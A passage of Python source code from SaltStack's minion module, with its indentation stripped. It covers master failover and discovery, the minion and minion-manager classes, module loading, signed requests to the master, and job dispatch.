# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns'] and opts['master_type'] == 'failover':
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
last_exc = None
opts['master_uri_list'] = []
opts['local_masters'] = copy.copy(opts['master'])
# shuffle the masters and then loop through them
if opts['random_master']:
# master_failback is only used when master_type is set to failover
if opts['master_type'] == 'failover' and opts['master_failback']:
secondary_masters = opts['local_masters'][1:]
shuffle(secondary_masters)
opts['local_masters'][1:] = secondary_masters
else:
shuffle(opts['local_masters'])
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
try:
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
if exc.strerror.startswith('Could not access'):
msg = (
'Failed to initiate connection with Master '
'%s: check ownership/permissions. Error '
'message: %s', opts['master'], exc
)
else:
msg = ('Master %s could not be reached, trying next '
'next master (if any)', opts['master'])
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
log.error(
'No master could be reached or all masters '
'denied the minion\'s connection attempt.'
)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not zmq:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
def _discover_masters(self):
'''
Discover master(s) and decide where to connect, if SSDP is around.
This modifies the configuration on the fly.
:return:
'''
if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False:
master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient()
masters = {}
for att in range(self.opts['discovery'].get('attempts', 3)):
try:
att += 1
log.info('Attempting %s time(s) to discover masters', att)
masters.update(master_discovery_client.discover())
if not masters:
time.sleep(self.opts['discovery'].get('pause', 5))
else:
break
except Exception as err:
log.error('SSDP discovery failure: %s', err)
break
if masters:
policy = self.opts.get('discovery', {}).get('match', 'any')
if policy not in ['any', 'all']:
log.error('SSDP configuration matcher failure: unknown value "%s". '
'Should be "any" or "all"', policy)
return
mapping = self.opts['discovery'].get('mapping', {})
discovered = []
for addr, mappings in masters.items():
for proto_data in mappings:
cnt = len([key for key, value in mapping.items()
if proto_data.get('mapping', {}).get(key) == value])
if policy == 'any' and bool(cnt) or cnt == len(mapping):
if self.opts['discovery'].get('multimaster'):
discovered.append(proto_data['master'])
else:
self.opts['master'] = proto_data['master']
return
self.opts['master'] = discovered
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to %s seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
retry_msg = msg % random_retry
log.debug('%s (randomized)', msg % random_retry)
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: %s or '
'return_retry_timer_max: %s). Both must be positive '
'integers.',
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
log.debug(msg, DEFAULT_MINION_OPTS['return_retry_timer'])
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg, self.opts.get('return_retry_timer'))
return self.opts.get('return_retry_timer')
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
import salt.loader
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# run ssdp discovery if necessary
self._discover_masters()
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
install_zmq()
io_loop = ZMQDefaultLoop.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import salt.utils.yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['saltenv'] is not None:
penv = self.opts['saltenv']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.files.fopen(ptop, 'wb') as fp_:
salt.utils.yaml.safe_dump(cache_top, fp_)
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.files.fopen(cache_sls, 'wb') as fp_:
salt.utils.yaml.safe_dump(self.opts['pillar'], fp_)
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
# self.matcher = Matcher(self.opts, self.functions)
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(
opts['conf_file'],
ignore_config_errors=ignore_config_errors,
role='master'
)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True}) # Tornado backward compat
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _check_minions(self):
'''
Check the size of self.minions and raise an error if it's empty
'''
if not self.minions:
err = ('Minion unable to successfully connect to '
'a Salt Master.')
log.error(err)
def _spawn_minions(self, timeout=60):
'''
Spawn all the coroutines which will sign in to masters
'''
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending of the networking and sets of masters. If match is 'any' we let
# eval_master handle the discovery instead so disconnections can also handle
# discovery
if isinstance(self.opts['discovery'], dict) and self.opts['discovery'].get('multimaster'):
self._discover_masters()
masters = self.opts['master']
if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue)
self.io_loop.spawn_callback(self._connect_minion, minion)
self.io_loop.call_later(timeout, self._check_minions)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
auth_wait = minion.opts['acceptance_wait_time']
failed = False
while True:
if failed:
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
log.debug(
"sleeping before reconnect attempt to %s [%d/%d]",
minion.opts['master'],
auth_wait,
self.max_auth_wait,
)
yield tornado.gen.sleep(auth_wait) # TODO: log?
try:
if minion.opts.get('beacons_before_connect', False):
minion.setup_beacons(before_connect=True)
if minion.opts.get('scheduler_before_connect', False):
minion.setup_scheduler(before_connect=True)
yield minion.connect_master(failed=failed)
minion.tune_in(start=False)
self.minions.append(minion)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up minion for multi-master. Is '
'master at %s responding?', minion.opts['master']
)
except SaltMasterUnresolvableError:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'master\' value in minion config.'.format(minion.opts['master'])
log.error(err)
break
except Exception as e:
failed = True
log.critical(
'Unexpected error while connecting to %s',
minion.opts['master'], exc_info=True
)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = [] if jid_queue is None else jid_queue
self.periodic_callbacks = {}
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if zmq:
if ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.platform.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
else:
if self.opts.get('beacons_before_connect', False):
log.warning(
'\'beacons_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['beacons_before_connect'] = False
if self.opts.get('scheduler_before_connect', False):
log.warning(
'\'scheduler_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['scheduler_before_connect'] = False
log.info('Creating minion process manager')
if self.opts['random_startup_delay']:
sleep_time = random.randint(0, self.opts['random_startup_delay'])
log.info(
'Minion sleeping for %s seconds due to configured '
'startup_delay between 0 and %s seconds',
sleep_time, self.opts['random_startup_delay']
)
time.sleep(sleep_time)
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True})
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.platform.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None, failed=False):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master(failed=failed)
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
if self._connect_master_future.done():
future_exception = self._connect_master_future.exception()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self, failed=False):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
async_pillar = salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv')
)
self.opts['pillar'] = yield async_pillar.compile_pillar()
async_pillar.destroy()
if not self.ready:
self._setup_core()
elif self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'run_on_start': True,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None, opts=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
opt_in = True
if not opts:
opts = self.opts
opt_in = False
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug(
'modules_max_memory set, enforcing a maximum of %s',
opts['modules_max_memory']
)
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()[:2]
mem_limit = rss + vms + opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
opts['grains'] = salt.loader.grains(opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(opts, proxy=proxy)
if opts.get('multimaster', False):
s_opts = copy.deepcopy(opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(opts, functions, proxy=proxy)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(opts, functions, proxy=proxy)
if opt_in:
self.opts = opts
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.client.ReqChannel.factory(self.opts)
try:
return channel.send(load, timeout=timeout)
finally:
channel.close()
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
try:
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
finally:
channel.close()
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return False
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
return False
else:
if timeout_handler is None:
def handle_timeout(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return True
timeout_handler = handle_timeout
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# Ensure payload is unicode. Disregard failure to decode binary blobs.
if six.PY2:
data = salt.utils.data.decode(data, keep=True)
if 'user' in data:
log.info(
'User %s Executing command %s with jid %s',
data['user'], data['fun'], data['jid']
)
else:
log.info(
'Executing command %s with jid %s',
data['fun'], data['jid']
)
log.debug('Command details %s', data)
# Don't duplicate jobs
log.trace('Started JIDs: %s', self.jid_queue)
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get('process_count_max')
process_count_max_sleep_secs = self.opts.get('process_count_max_sleep_secs')
if process_count_max > 0:
process_count = len(salt.utils.minion.running(self.opts))
while process_count >= process_count_max:
log.warning('Maximum number of processes (%s) reached while '
'executing jid %s, waiting %s seconds...',
process_count_max,
data['jid'],
process_count_max_sleep_secs)
yield tornado.gen.sleep(process_count_max_sleep_secs)
process_count = len(salt.utils.minion.running(self.opts))
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.platform.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''
Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
def run_func(minion_instance, opts, data):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
return Minion._thread_multi_return(minion_instance, opts, data)
else:
return Minion._thread_return(minion_instance, opts, data)
with tornado.stack_context.StackContext(functools.partial(RequestContext,
{'data': data, 'opts': opts})):
with tornado.stack_context.StackContext(minion_instance.ctx):
run_func(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job %s with PID %s', data['jid'], sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
executors = data.get('module_executors') or \
getattr(minion_instance, 'module_executors', []) or \
opts.get('module_executors', ['direct_call'])
allow_missing_funcs = any([
minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name)
for executor in executors
if '{0}.allow_missing_func' in minion_instance.executors
])
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data['arg'], data
